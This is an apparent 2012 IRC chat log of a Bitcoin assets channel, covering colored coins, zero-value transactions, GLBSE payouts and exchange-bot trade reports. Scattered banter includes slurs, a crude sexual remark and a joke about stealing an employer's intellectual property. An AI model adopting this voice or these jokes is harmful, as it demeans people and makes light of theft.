Oct 16 01:53:46 might be better with a 'energy lite' coin like a PoS Oct 16 01:53:52 Luke-Jr, by having both the sharecoins and bitcoins sharing the same address space Oct 16 01:53:53 BTC-Mining: the way they're doing it, a single transaction changes ownership of the stock and also remits the payment for it Oct 16 01:54:02 BTC-Mining: address space is irrelevant Oct 16 01:54:23 the address holding the sharecoin gets paid the bitcoins Oct 16 01:55:32 Aye, but having to isolate colored coins in the Bitcoin blockchain and provide a mechanism to not spend them yet receive Bitcoins directly on the same address seems unpractical. Oct 16 01:55:41 BTC-Mining: and if he never gives the shares over? Oct 16 01:56:03 BTC-Mining: Bitcoin-Qt 0.7 added a raw transaction API just for things like this Oct 16 01:56:54 Excellent then. Oct 16 01:56:55 [MPEX] [S.MPOE] 31581 @ 0.00040609 = 12.8247 BTC [-] Oct 16 01:56:56 [MPEX] [S.MPOE] 27419 @ 0.00040606 = 11.1338 BTC [-] Oct 16 01:57:27 in fact atomicity of transaction is a huge deal. Oct 16 01:57:40 so prolly this idea is no good simply on the grounds that it has nop way to guarantee it. Oct 16 01:58:32 Wait, if someone never gives the share? You mean like an exchange of colored coins/bitcoins being preauthorized so the exchange is made together safely? Oct 16 01:58:47 Without any third party? Oct 16 01:59:11 right Oct 16 01:59:25 there's a single transaction that transfers the payment (in Bitcoins) and also transfers the stocks Oct 16 01:59:30 both parties sign it Oct 16 01:59:32 Well that would be a huge plus in favor of keeping everything on the same blockchain Oct 16 01:59:50 exactly. Oct 16 02:00:19 Luke-Jr thanks :) Oct 16 02:00:22 imagine a day where cars check the blockchain to validate the key opening them :P Oct 16 02:00:41 i like jgarzik more and more. Oct 16 02:02:31 Yes, but with bitcoins being divisible indefinitly and being a deflationary currency, wouldn't you run into the risk a colored coin becoming more valuable than the underlying asset or being colored multiple time? Oct 16 02:03:13 divisible indefinitly << this is false Oct 16 02:03:22 there are no more than 21`000`000`0000`0000 bitcoin units. Oct 16 02:03:32 It could be changed if needed Oct 16 02:03:44 it could, yea. Oct 16 02:04:00 There's technically no limit to how much we could further allow it to be split. Oct 16 02:04:02 but see, if you later add further subdivision Oct 16 02:04:08 Just a limit on how much is created Oct 16 02:04:14 the current satoshis will still be high not low bits. Oct 16 02:04:50 Also any share blackholed would forever get dividends being blackholed... Oct 16 02:05:34 Although I guess we could consider that a share donated to the whole bitcoin economy at large... Oct 16 02:05:48 With dividends benefitting every holder. Oct 16 02:07:46 this is somewhat of a problem, blackholed shares Oct 16 02:08:26 Well no really, any blackholed dividends going to those shares would reduce circulating Bitcoins, raising value of remaining Bitcoins. Oct 16 02:08:54 So it would really be like dividends spread to every other bitcoin holder. Oct 16 02:13:49 BTC-Mining: the coloured coins are 0 value Oct 16 02:14:13 ?? Oct 16 02:14:35 amount = 0x0000000000000000 satoshis Oct 16 02:14:43 Oh... Oct 16 02:14:49 Bitcoin does not have rule that coins must have a positive value Oct 16 02:14:52 just non-negative :P Oct 16 02:14:58 lol Oct 16 02:15:11 Wow... wasn't aware that was even possible Oct 16 02:15:28 So basically anyone could create as much 0 value coins and mark them. Oct 16 02:15:29 p2pool uses it for a hack merged mining optimization Oct 16 02:15:35 if miners accept it Oct 16 02:15:48 I don't think any miners accept 0-value coins without a fee right now Oct 16 02:17:09 Well technically, miners accept transactions with their set minimum fee, so shouldn't having a big enough fee along the zero value coins work? Oct 16 02:17:22 hence "without a fee" Oct 16 02:17:36 Eligius will charge more than ordinary for a zero-value coin Oct 16 02:17:55 ahahahah kickass Oct 16 02:17:59 Well we already pay fees to trade shares on exchanges like MPEx or defunct GLBSE Oct 16 02:18:11 right Oct 16 02:18:17 I don't see sending a fee with those zero value coins as a problem at all Oct 16 02:18:18 dude i want to know if satoshi DID THIS ON PURPOSE Oct 16 02:18:36 tough luck mircea, he's no longer around Oct 16 02:18:53 I won't be so sure Oct 16 02:19:12 We just don't know who he is Oct 16 02:19:20 it's the butler. Oct 16 02:19:35 It's always the butler... Oct 16 02:19:39 probably jed Mccaleb Oct 16 02:19:59 But I have just found a renewed love for Bitcoins over a feature I wasn't aware of. Oct 16 02:21:10 BTC-Mining funny how that works. Oct 16 02:21:20 but it's so damn clever this thing. Oct 16 02:21:41 people keep whining about jail ? fuck it, i see little problem in going to jail for bitcoin. i'm a bitcoin patriot. Oct 16 02:22:27 [MPEX] [S.MPOE] 644 @ 0.00040741 = 0.2624 BTC [+] Oct 16 02:22:28 [MPEX] [S.MPOE] 28856 @ 0.00040871 = 11.7937 BTC [+] Oct 16 02:22:50 Maybe I could concentrate a lot more if I was in jail... Oct 16 02:23:13 ikr ? less bitches rubbing into me while im trying to type, more predictable schedule... Oct 16 02:23:45 its different for people with families Oct 16 02:24:08 people with families have no business dicking around the fronteer. Oct 16 02:24:22 especially not if they're going to whine about their families then. Oct 16 02:24:28 of course Oct 16 02:24:37 People with families are already on the dead end Oct 16 02:24:54 ok, I guess you just kicked all the developers out of the bitcoin project… Oct 16 02:24:55 I'm refusing to enter there Oct 16 02:25:11 lol Oct 16 02:25:21 Most of the developers have families and kids :D Oct 16 02:25:31 No, we need people with families too Oct 16 02:25:52 Luke-Jr do you know of that guy that renounced us citizenship to be able to do cryptography in peace ? Oct 16 02:26:02 mircea_popescu: no Oct 16 02:26:19 Vincent Cate Oct 16 02:26:30 lives in like... hm. some A place. Oct 16 02:26:56 http://www.efc.ca/pages/media/nytimes.06sep98.html there Oct 16 02:27:11 anguilla. Oct 16 02:27:54 I wonder why you cant renounce citizenshipo while youre still in the country Oct 16 02:28:16 you can Oct 16 02:28:23 you'll just be immediately arrested and deported Oct 16 02:28:36 where to ? Oct 16 02:28:42 what the Oct 16 02:28:48 the united states ? Oct 16 02:28:51 oh, easy Oct 16 02:28:53 the sun Oct 16 02:28:58 lolright. Oct 16 02:29:15 actually Im kidding Oct 16 02:29:18 if you try to tell the cops you have no citizenship they still tazer you :P Oct 16 02:29:22 they'll just execute you for being a foreign spy Oct 16 02:29:58 has anyone used bitcrow? Oct 16 02:30:09 "There's less chance of getting in any trouble with the U.S. government and there's also less chance of getting shot by a terrorist" Oct 16 02:30:17 this was 3 years before 7/11 Oct 16 02:30:54 9/11? Oct 16 02:31:00 ya that. Oct 16 02:48:27 [MPEX] [S.MPOE] 7300 @ 0.00040606 = 2.9642 BTC [-] Oct 16 02:56:02 "I fail to faglow" wise words from mircea_popescu Oct 16 02:56:43 lol? Oct 16 02:59:01 did usagi forget to take their meds ? Oct 16 03:04:04 mircea_popescu: http://imgur.com/LEqTl Oct 16 03:09:53 a haha Oct 16 03:13:54 [MPEX] [S.MPOE] 3181 @ 0.00040606 = 1.2917 BTC [-] Oct 16 03:19:39 whats the news on usagi? Oct 16 03:20:41 Mithridates married his first young sister Laodice. Laodice was 16 years old and was her brother’s first wife. Mithridates married Laodice to preserve the purity of their blood-line, as a wife to rule with him as a sovereign over Pontus, to ensure the succession to his legitimate children, and to claim his right as a ruling monarch. Oct 16 03:22:04 too old Oct 16 03:23:57 well they didn't have internets back then Oct 16 03:26:03 oh no, bitcoin has taken over my mind Oct 16 03:26:15 i just tried to use the command "ifcoinfig" Oct 16 03:27:35 lulz Oct 16 03:28:16 but really, the 80s calledplease return their retarded tools Oct 16 03:28:54 what do you use to find out an unknown local ip? Oct 16 03:29:15 iproute2 (ip addr) Oct 16 03:29:31 okies, i'll check it out :) Oct 16 03:29:32 if coin is a fig ? Oct 16 03:30:12 inb4 fagBSD Oct 16 03:32:08 ;;bc,stats Oct 16 03:32:10 Current Blocks: 203469 | Current Difficulty: 3054627.5269486 | Next Difficulty At Block: 203615 | Next Difficulty In: 146 blocks | Next Difficulty In About: 23 hours, 45 minutes, and 56 seconds | Next Difficulty Estimate: 3061065.26839779 | Estimated Percent Change: 0.210753729952 Oct 16 03:32:23 oh, not a drop? Oct 16 03:33:33 not looking likely Oct 16 03:34:31 ;;ticker Oct 16 03:34:31 Best bid: 11.86396, Best ask: 11.9897, Bid-ask spread: 0.12574, Last trade: 11.86396, 24 hour volume: 26620, 24 hour low: 11.43, 24 hour high: 11.9899 Oct 16 03:34:45 oh, bact to >11.85? Oct 16 03:34:51 *back Oct 16 03:35:02 ;;bt,24hrprc Oct 16 03:35:03 Error: "bt,24hrprc" is not a valid command. Oct 16 03:35:09 ;;bt,24hprc Oct 16 03:35:09 Error: "bt,24hprc" is not a valid command. Oct 16 03:35:14 ;;bc,24hprc Oct 16 03:35:16 11.68 Oct 16 03:39:20 [MPEX] [S.MPOE] 44619 @ 0.00040587 = 18.1095 BTC [-] Oct 16 03:39:22 [MPEX] [S.MPOE] 11344 @ 0.00040871 = 4.6364 BTC [+] Oct 16 03:39:25 [MPEX] [S.MPOE] 49348 @ 0.00040982 = 20.2238 BTC [+] Oct 16 03:39:28 [MPEX] [S.MPOE] 55044 @ 0.00041087 = 22.6159 BTC [+] Oct 16 03:39:33 [MPEX] [S.MPOE] 13600 @ 0.0004177 = 5.6807 BTC [+] Oct 16 03:39:38 [MPEX] [S.MPOE] 6000 @ 0.00041888 = 2.5133 BTC [+] Oct 16 03:39:41 [MPEX] [S.MPOE] 420045 @ 0.00042 = 176.4189 BTC [+] Oct 16 03:39:52 It's monday Oct 16 03:40:01 Weekend dip is over Oct 16 03:40:12 lewl Oct 16 03:40:38 I herd kim dotcom sold some bitcoins Oct 16 03:41:24 Somebody is pretty determined to buy all the S.MPOE Oct 16 03:44:29 anyone here interested in ordering dinner for me Oct 16 03:44:31 in exchange for btc? Oct 16 03:44:34 i cant find anyone in -otc Oct 16 03:45:08 sure, If I get to choose what you have Oct 16 03:45:17 heh no Oct 16 03:45:59 one full bag of hamster dicks enroute Oct 16 03:46:18 eh, rg, I would but Oct 16 03:46:38 Thing I don't like with that is it appears on my credit card/banking statements Oct 16 03:46:56 Which would require me to convert more bitcoins to fiat to pay bills Oct 16 03:47:02 Which looks like income. Oct 16 03:47:11 Which I report and pay taxes on. Oct 16 03:48:12 I just don't want to explain that the money appearing in my account is not income but that I make credit card purchases for others. Oct 16 03:48:27 I would actually like everything to be transactable directly into bitcoins... Oct 16 03:48:34 with* Oct 16 03:49:27 lol so ' no ' Oct 16 03:49:45 yeah Oct 16 03:50:21 I think I'd have to be registered as a money transfer service to make credit card payments for people and deduct them from income. Oct 16 03:51:06 Even so... Oct 16 03:51:17 Otherwise if my tax reports are investigated, it's kind of hard to explain why you deducted a payment to a restaurant from your income. Oct 16 04:01:41 ./BTC-mining -vvvvvvvvvvvvvvvv Oct 16 04:01:52 amirite? Oct 16 04:05:21 [MPEX] [S.MPOE] 10000 @ 0.00041999 = 4.1999 BTC [-] Oct 16 04:05:25 [MPEX] [S.MPOE] 31128 @ 0.00042 = 13.0738 BTC [+] Oct 16 04:17:49 i dont have iproute2 either Oct 16 04:20:22 do you have linux? Oct 16 04:21:20 yes Oct 16 04:22:31 the binary is called 'ip' Oct 16 04:23:03 i did apt-file search, i see its in iproute, i don't have that installed Oct 16 04:23:16 ok cool i'll check it out Oct 16 04:23:44 anything debian based should have it stock Oct 16 04:23:56 yeah i see it now, ip Oct 16 04:29:31 https://bitcointalk.org/index.php?topic=112443.msg1222159#msg1222159 lol Oct 16 04:29:59 and dub, thanks for the recomendation of that tool :) Oct 16 04:30:14 it is your friend Oct 16 04:31:11 [MPEX] [S.MPOE] 33200 @ 0.00041552 = 13.7953 BTC [-] Oct 16 04:31:35 problem is that once in a blue moon someone will ask you to operate a less civilised unix and enragement will ensue as you fumble around without it Oct 16 04:39:41 BTC-Mining are you kidding ? i deduct tons of restaurant bills. Oct 16 04:39:43 business expense. Oct 16 04:48:24 eh Oct 16 04:51:31 mircea_popescu: learn to cook Oct 16 04:51:35 ^^;; Oct 16 04:56:52 [MPEX] [S.MPOE] 20943 @ 0.00042 = 8.7961 BTC [+] Oct 16 04:57:17 or just hire me Oct 16 04:58:28 I'd consider a corporate chef type gig in a porno empire Oct 16 05:12:36 TheSeven are you kidding ? i'm a cook master. Oct 16 05:12:58 http://trilema.com/2012/lets-cook-shrimp-and-pasta/ :D Oct 16 05:15:48 mmm crispy pcb Oct 16 05:16:13 mircea_popescu: that is an abomination Oct 16 05:16:56 yes, nice rpi extension board :) Oct 16 05:22:22 [MPEX] [S.MPOE] 4099 @ 0.00042 = 1.7216 BTC [+] Oct 16 05:29:08 oh man Oct 16 05:29:12 we discover more about -PR Oct 16 05:29:54 copumpkin: ? Oct 16 05:30:00 oh nothing Oct 16 05:30:13 just stalking mircea_popescu via -PR Oct 16 05:33:50 copumpkin oh ? Oct 16 05:34:11 I know all about her! Oct 16 05:34:15 liek ? Oct 16 05:34:21 her name! Oct 16 05:34:34 i thought you had a gf. Oct 16 05:34:54 oh, I do Oct 16 05:35:09 I was just trying to figure out if she was a real person or just your feminine alter ego Oct 16 05:35:17 and it turns out she is real! Oct 16 05:35:40 i toldja lol Oct 16 05:36:00 dub why abomination ?! Oct 16 05:38:18 uh, what's the problem with those shrimp pastas? Oct 16 05:39:17 ignore me Oct 16 05:39:27 I'm a food snob Oct 16 05:40:40 huh, so usagi keeps bumping the fuck out of that thread i started Oct 16 05:41:47 and in one post he wrote "I'm going back to sleep and if Smickles posts this publicly I won't bother commenting here further. " which i don't understand because this post was, in fact, posted by him Oct 16 05:43:01 oh, usagi is active on the forum? Oct 16 05:43:06 very Oct 16 05:43:11 dub but srsly, what's the issue ? Oct 16 05:43:18 very bery Oct 16 05:43:36 also, you ppl must see http://trilema.com/2012/bandaged/ Oct 16 05:43:52 mircea_popescu: show him when you cooked bacon that one time Oct 16 05:44:04 um which one ? Oct 16 05:44:10 Bitcointalk.org should have a tutorial when you register. You start in a cave and an old man says: "It's dangerous to go alone. Take this." Upon which point you receive a bag containing the following books: "Trolling for Dummies", "Living Among the Trolls", "Trollslaying 101" & "How to Troll Further" Oct 16 05:44:11 didn't jcpham put it on youtube? Oct 16 05:44:20 mircea_popescu: I'll have to look again, but what flavor or seasoning? just the 'shrimp'? Oct 16 05:44:32 heh you're not a food snob, you're an internet superficialist. Oct 16 05:44:44 read teh textual strings of letters! Oct 16 05:44:44 also your roux is going to taste liks shit Oct 16 05:44:58 cause whai! Oct 16 05:45:18 cause its cooked too quickly for one Oct 16 05:45:31 lmao you intuit from stills how fast it cooks ?! Oct 16 05:46:03 maybe he checked exif Oct 16 05:46:20 O_0 Oct 16 05:47:18 lol seems legit. exif is all fuxed up. Oct 16 05:47:35 [MPEX] [S.MPOE] 19864 @ 0.00041951 = 8.3331 BTC [-] Oct 16 05:47:37 [MPEX] [S.MPOE] 22636 @ 0.00041639 = 9.4254 BTC [-] Oct 16 05:49:14 i'm sold on Bandaged Oct 16 05:51:54 mircea_popescu: its not bad Oct 16 05:52:22 aok Oct 16 05:52:51 the roux cooked in there offends me a little Oct 16 05:53:08 why tho ? Oct 16 05:53:35 classical training Oct 16 05:54:18 a. i'm beyong ecclectic. Oct 16 05:59:42 be young Oct 16 06:12:58 [MPEX] [S.MPOE] 8000 @ 0.00041766 = 3.3413 BTC [+] Oct 16 06:20:28 He is currently the Frederick P. Rose Director of the Hayden Planetarium at the Rose Center for Earth and Space Oct 16 06:20:37 this abominable bullshit has to cease. Oct 16 06:21:03 i Bill Clinton mean this Barack Obama bullshit has to John Perry cease. Oct 16 06:29:22 [MPEX] [O.BTCUSD.P200T] 6 @ 0.71152992 = 4.2692 BTC [-] Oct 16 06:31:20 [MPEX] [O.BTCUSD.P170T] 1 @ 0.46756602 BTC [+] Oct 16 06:31:22 [MPEX] [O.BTCUSD.P170T] 17 @ 0.45435043 = 7.724 BTC [-] Oct 16 06:32:14 mircea_popescu: is the volume on options down recently? Oct 16 06:32:35 prolly Oct 16 06:44:42 During the week ending October 3rd, investors pulled more than 10 billion dollars out of U.S. mutual funds. Overall, a total of more than 100 billion dollars has been pulled out of U.S. mutual funds so far this year. Oct 16 06:44:50 coming to btc ? :D Oct 16 06:56:30 jeez, evoorhees is such a scammer https://bitcointalk.org/index.php?topic=118650.0 Oct 16 06:56:52 [MPEX] [S.MPOE] 4475 @ 0.00041639 = 1.8633 BTC [-] Oct 16 06:57:12 mircea_popescu: how much money is usually pulled out of mutual funds? Oct 16 06:57:29 well some years they get a net inflow obviously Oct 16 06:57:55 overall they have some trillions under management, so it's not like they were crunched for half or anything Oct 16 07:01:24 mircea_popescu: oh, so 'pulled out' was a net number? Oct 16 07:02:36 lemme get you the link Oct 16 07:02:43 http://buzz.money.cnn.com/2012/10/11/investors-stocks-inflows-outflows/ Oct 16 07:03:34 ;;asks 15 Oct 16 07:03:36 There are currently 82972.165 bitcoins offered at or under 15.0 USD, worth 1112997.84801 USD in total. Oct 16 07:05:15 ;;market buy 10000000000 Oct 16 07:05:17 This order would exceed the size of the order book. You would buy 132263.32 bitcoins, for a total of 2854946344805.6753 USD and take the price to 1337000001337.0000. Oct 16 07:05:30 mwahahah! Oct 16 07:06:24 ;;bc,stats Oct 16 07:06:26 Current Blocks: 203491 | Current Difficulty: 3054627.5269486 | Next Difficulty At Block: 203615 | Next Difficulty In: 124 blocks | Next Difficulty In About: 20 hours, 13 minutes, and 8 seconds | Next Difficulty Estimate: 3062275.90012393 | Estimated Percent Change: 0.250386441812 Oct 16 07:06:42 .py 203491*50 Oct 16 07:06:43 10174550 Oct 16 07:22:07 [MPEX] [S.MPOE] 31400 @ 0.00041755 = 13.1111 BTC [+] Oct 16 07:22:09 [MPEX] [S.MPOE] 6500 @ 0.00042 = 2.73 BTC [+] Oct 16 07:35:40 ... can someone explains me this: http://lolsnaps.com/upload_pic/JustAnotherSoccerFight-47959.gif Oct 16 07:39:30 BTC-Mining: its common to fake injury Oct 16 07:40:30 No, no... They make those people out of glass Oct 16 07:40:32 lmao Oct 16 07:40:37 No other explanation Oct 16 07:40:56 nope, its a soccer thing Oct 16 07:41:01 I hate sports, and dont watch soccer, but I know this Oct 16 07:42:58 Nah, they abduct people, removes the bones and replace them with glass, then forces them to play and hit themselves. Oct 16 07:43:27 Acting lessons were too expensive. Oct 16 07:47:13 [MPEX] [S.MPOE] 379 @ 0.00041639 = 0.1578 BTC [-] Oct 16 07:50:20 http://boingboing.net/2012/10/15/winners-of-the-pirate-flix-vid.html Oct 16 08:02:51 ok, mircea_popescu i'm sure there's an arb op here b/t mpex options and the future on icbit.se Oct 16 08:04:46 like, i just /know it/ Oct 16 08:14:18 [MPEX] [S.MPOE] 2210 @ 0.00041639 = 0.9202 BTC [-] Oct 16 08:14:19 [MPEX] [S.MPOE] 3304 @ 0.00041552 = 1.3729 BTC [-] Oct 16 08:14:21 [MPEX] [S.MPOE] 11263 @ 0.00041522 = 4.6766 BTC [-] Oct 16 08:32:28 Your GLBSE account has been partially processed for bitcoin Oct 16 08:40:07 [MPEX] [S.MPOE] 21592 @ 0.00042 = 9.0686 BTC [+] Oct 16 08:45:28 smickles it has volume now ? Oct 16 08:45:48 the one time i looked (maybe a week or two ago) it was ~1btc Oct 16 09:05:55 [MPEX] [S.MPOE] 3300 @ 0.0004169 = 1.3758 BTC [-] Oct 16 09:34:01 [MPEX] [S.MPOE] 4400 @ 0.0004169 = 1.8344 BTC [-] Oct 16 09:36:30 in case you were wondering : http://trilema.com/2012/clear-signs-that-youre-gay-you-dont-even-know-about/ Oct 16 09:59:42 [MPEX] [S.MPOE] 27000 @ 0.0004169 = 11.2563 BTC [-] Oct 16 09:59:44 [MPEX] [S.MPOE] 1400 @ 0.00041679 = 0.5835 BTC [-] Oct 16 09:59:45 [MPEX] [S.MPOE] 7400 @ 0.00041586 = 3.0774 BTC [-] Oct 16 10:25:23 [MPEX] [S.MPOE] 5000 @ 0.00041586 = 2.0793 BTC [-] Oct 16 10:25:25 [MPEX] [S.MPOE] 38127 @ 0.00041522 = 15.8311 BTC [-] Oct 16 10:25:26 [MPEX] [S.MPOE] 773 @ 0.00041519 = 0.3209 BTC [-] Oct 16 10:51:46 [MPEX] [S.MPOE] 7900 @ 0.00041787 = 3.3012 BTC [+] Oct 16 11:17:15 [MPEX] [S.MPOE] 21673 @ 0.00041519 = 8.9984 BTC [-] Oct 16 11:17:17 [MPEX] [S.MPOE] 19227 @ 0.00041517 = 7.9825 BTC [-] **** BEGIN LOGGING AT Tue Oct 16 15:20:30 2012 Oct 16 15:23:20 smicklez is keen to contracts Oct 16 15:23:38 MrTiggr Cannot GET /images/socnet/bitcoin-assets/bitcoin-assets-current.png Oct 16 15:25:19 ahaha the "colored coins" stupidity is actually meni rosenfeld's idea ? Oct 16 15:25:23 why am i not surprised it's stupid ? Oct 16 15:34:00 [MPEX] [S.MPOE] 5090 @ 0.00041751 = 2.1251 BTC [+] Oct 16 15:34:01 [MPEX] [S.MPOE] 9910 @ 0.00041772 = 4.1396 BTC [+] Oct 16 15:48:30 mircea_popescu: i moved it, sorry Oct 16 15:48:32 http://www.worldzeitgeist.org/images/socnet/bitcoin-assets/bitcoin-assets-current.png Oct 16 15:48:34 no :443 Oct 16 15:48:51 a ok Oct 16 15:49:01 kakobrekla you need to update the link :p Oct 16 15:49:22 im about to update the algorithm too Oct 16 15:49:36 soon, anyone who says the word scammer will get redder and redder Oct 16 15:49:38 :D Oct 16 15:50:05 lol that helps ?! Oct 16 15:50:18 well ..ill make it better over time Oct 16 15:50:20 but yeh it does Oct 16 15:50:30 a qwik look will tell where the scammer-talk is going on Oct 16 15:50:40 which is what i use it for mostly Oct 16 15:51:44 i c Oct 16 15:52:10 https://bitcointalk.org/index.php?topic=118351.0 this is pretty crazy stuff Oct 16 15:53:01 "I don't know how much GLBSE lost that day but I wouldn't be surprised if bad coding resulting in heavy losses was one of the reasons nefario wasn't making much money from the business." Oct 16 15:53:09 ^^ ive heard a few comments like that Oct 16 15:55:46 i know they were carrying a buncha debt on the books since forever Oct 16 15:56:01 also, i showed all you guys http://www.iseecoins.org/ didnt i, mircea_popescu ? Oct 16 15:56:16 yup Oct 16 15:56:24 k Oct 16 15:56:48 expect new coolness soon too :D mwahahaha .. i think u'll like it Oct 16 15:58:00 "I don't have to dispute or even answer you, because you're a whacked out loser." hey smickles, you suck nao. Oct 16 15:58:04 sorry. Oct 16 15:58:52 :D thanks kakobrekla Oct 16 15:59:01 yw Oct 16 15:59:14 [MPEX] [S.MPOE] 1847 @ 0.00041716 = 0.7705 BTC [-] Oct 16 15:59:15 [MPEX] [S.MPOE] 3500 @ 0.00041563 = 1.4547 BTC [-] Oct 16 16:01:30 https://bitcointalk.org/index.php?topic=114961.0 o hey, pirate paid on the 12 ?! Oct 16 16:01:48 any esxi experts here Oct 16 16:02:12 rg lol Oct 16 16:04:23 lmao so I get btctalk digests from my pr girl. this stuff is almost as funny as the forum itself. for instance : Oct 16 16:04:38 no idea what's going on, i think last poster may be calling someone a turdlord or something but i cant actually tell. possible drugs. Oct 16 16:05:38 lol Oct 16 16:05:49 'turdlord" ROFL Oct 16 16:05:53 you are badmothing drugs. Oct 16 16:06:04 badmothballing Oct 16 16:06:04 mouthing* Oct 16 16:06:05 drugz Oct 16 16:06:11 yeah Oct 16 16:06:14 leave drugs alone Oct 16 16:06:21 ;> Oct 16 16:06:33 drugs killed my cat. Oct 16 16:06:33 rampant inbreeding is the culprit Oct 16 16:06:38 * MrTiggr is now know as Turdlord ... thats a cool nichk :D Oct 16 16:06:43 for forums not your cat Oct 16 16:06:49 MrTiggr sounds a little gay tho Oct 16 16:06:53 lol Oct 16 16:06:56 not hte good gay either Oct 16 16:07:01 nope, not rly. Oct 16 16:07:33 course seeing how with old age i tend to do chicks in the ass more than in the cunt, i guess i could call my dick turdlord. Oct 16 16:07:41 i never had a name for it before anyway, always kinda felt left out. Oct 16 16:07:47 ctl-alt-del Oct 16 16:24:50 [MPEX] [S.MPOE] 32900 @ 0.00041455 = 13.6387 BTC [-] Oct 16 16:41:40 usagi is gone completely mad...LOL Oct 16 16:46:41 I am happy to report that I have received the BTC I had at GLBSE Oct 16 16:48:11 DeaDTerra: good for you Oct 16 16:50:06 [MPEX] [S.MPOE] 5700 @ 0.00041455 = 2.3629 BTC [-] Oct 16 16:51:51 I got email saying I had been paid out but recieved no btc Oct 16 16:53:01 :> Oct 16 16:53:40 Yep :) Oct 16 16:56:12 interesting. I haven't got any e-mails or coin Oct 16 16:56:40 Looks like this is a really slow process. Question is: why so slow Oct 16 17:15:09 [MPEX] [S.MPOE] 8400 @ 0.00041392 = 3.4769 BTC [-] Oct 16 17:15:09 [MPEX] [S.MPOE] 1500 @ 0.00041377 = 0.6207 BTC [-] Oct 16 17:32:31 I posted a updated contract and i think the issue of ART-OTA being a security is resolved. Oct 16 17:33:20 Constructive comments are welcome Oct 16 17:40:38 [MPEX] [S.MPOE] 4900 @ 0.00041377 = 2.0275 BTC [-] Oct 16 17:41:01 dub: had the same thing yesterday evening but got my coins in the course of the night :) Oct 16 17:57:03 should have asked here Oct 16 17:57:05 did any glbse asset issuers receive shareholder information yet? Oct 16 17:58:05 pigeons: I don't think so Oct 16 17:58:41 I haven't, at least, and I don't know of anybody who has Oct 16 18:02:23 I've been at work for 20 hours Oct 16 18:04:47 more caffine at this point could be fatal Oct 16 18:05:26 or fun Oct 16 18:05:55 [MPEX] [S.MPOE] 100 @ 0.00041377 = 0.0414 BTC [-] Oct 16 18:05:57 [MPEX] [S.MPOE] 5206 @ 0.00041377 = 2.1541 BTC [-] Oct 16 18:05:58 [MPEX] [S.MPOE] 34100 @ 0.00041344 = 14.0983 BTC [-] Oct 16 18:22:19 pleas no! Oct 16 18:23:02 maybe the doctor will put shim back on shis medicine Oct 16 18:23:14 and yes usagi, you are sick ... LOL Oct 16 18:31:45 [MPEX] [S.MPOE] 1194 @ 0.00041316 = 0.4933 BTC [-] Oct 16 18:31:46 [MPEX] [S.MPOE] 5853 @ 0.00041455 = 2.4264 BTC [+] Oct 16 18:31:48 [MPEX] [S.MPOE] 15490 @ 0.00041772 = 6.4705 BTC [+] Oct 16 18:31:49 [MPEX] [S.MPOE] 10363 @ 0.00041787 = 4.3304 BTC [+] Oct 16 18:57:38 [MPEX] [S.MPOE] 41400 @ 0.00041275 = 17.0879 BTC [-] Oct 16 19:11:52 http://bitcoinmagazine.net/interview-with-glbses-nefario/ Oct 16 19:23:41 [MPEX] [S.MPOE] 6037 @ 0.00041787 = 2.5227 BTC [+] Oct 16 19:23:42 [MPEX] [S.MPOE] 8463 @ 0.00041843 = 3.5412 BTC [+] Oct 16 19:33:41 mircea_popescu, did u actually send 3btc to 001sonkit on the forum? Oct 16 19:42:18 thestringpuller: the last comment is spot on Oct 16 19:45:52 EskimoBob: so everyone is lying? Oct 16 19:46:02 it's like an episode of law and order Oct 16 19:49:00 [MPEX] [S.MPOE] 16704 @ 0.00041275 = 6.8946 BTC [-] Oct 16 19:49:01 [MPEX] [S.MPOE] 11933 @ 0.00041274 = 4.9252 BTC [-] Oct 16 19:56:10 if FSA says it not money, then wtf is nefario yapping about? Has he shown any documents taht prove he ever had ANY communications with any gov agency? Oct 16 19:57:17 EskimoBob he has not Oct 16 19:57:57 i read as his interview as this: if i never log in to glbse again, I get nothing Oct 16 19:58:02 I have yet to log in Oct 16 20:17:40 [MPEX] [S.MPOE] 7000 @ 0.0004129 = 2.8903 BTC [+] Oct 16 20:26:56 gigavps: It is so easy to ask for the documents from gov. agency. Untill I see one, I think it's all one big BS Oct 16 20:27:49 I am sure we will find out soon, what the real reason was because of the shit slinging between tyhemos etc Oct 16 20:30:52 EskimoBob Oct 16 20:31:00 you around Oct 16 20:42:42 [MPEX] [S.MPOE] 1900 @ 0.00041372 = 0.7861 BTC [+] Oct 16 21:06:25 PsychoticBoy: yo Oct 16 21:08:23 [MPEX] [S.MPOE] 7600 @ 0.00041372 = 3.1443 BTC [+] Oct 16 21:08:25 [MPEX] [S.MPOE] 23000 @ 0.00041617 = 9.5719 BTC [+] Oct 16 21:09:25 yes I am Oct 16 21:10:00 ;rate EskimoBob -10 scammer isn't even a real eskimo Oct 16 21:10:12 yo Oct 16 21:10:26 pigeons: wtf :) Oct 16 21:10:50 pics with igloo on your head Oct 16 21:11:01 ;rate usagi -100 is not even a real girl Oct 16 21:11:08 lol Oct 16 21:11:37 as much of a G.I.R.L. as I am (Guy In Real Life) Oct 16 21:11:57 pigeons: picture of you flying and holding a bitcoin betwwen you peek Oct 16 21:12:44 http://www.youtube.com/watch?v=dexQhvczVeM Oct 16 21:12:56 pigeons: I actually rated you +2 after the trade Oct 16 21:13:15 what about meeeee.... Oct 16 21:13:28 i don't negotiate with terrorists Oct 16 21:13:58 police? where? Oct 16 21:14:25 so tell us what this "art equipment" is? Oct 16 21:21:12 pigeons: see PM Oct 16 21:21:42 "thestringpuller | you around" - yes I am. wzz up? Oct 16 21:23:57 pigeons: happy with the answer? Oct 16 21:25:00 yes Oct 16 21:25:12 i was half pickin on you and also genuinely curious Oct 16 21:29:50 EskimoBob: sorry was getting ready for work Oct 16 21:30:04 I feel strange being a btc advocate and working for a credit card processor during the day Oct 16 21:30:25 my plan is to steal all their IP and apply it to BTC Oct 16 21:30:49 :) Oct 16 21:30:52 good idea Oct 16 21:31:15 http://www.romneytaxplan.com/ Oct 16 21:31:40 what happened to Romeny tax return fiasco? Oct 16 21:31:43 as I told smickles I'm working on a (maybe open source) solution for bitinstants debit card Oct 16 21:32:23 ... Oct 16 21:32:30 well how would do an opensource? Oct 16 21:32:37 you need a bank to process transactions Oct 16 21:32:48 Don't get caught thestringpuller =P Oct 16 21:33:02 not really vampireb_ Oct 16 21:33:15 not really? Oct 16 21:33:25 as far as i recall you do Oct 16 21:33:25 card reader can be plugged to a pc or laptop and client software Oct 16 21:33:31 [MPEX] [S.MPOE] 800 @ 0.00041843 = 0.3347 BTC [+] Oct 16 21:33:41 I use card reader every day Oct 16 21:33:44 to do any kind of transactions with cards you need to connect to visa network Oct 16 21:33:47 on my PC Oct 16 21:33:54 who cares about card readers. Oct 16 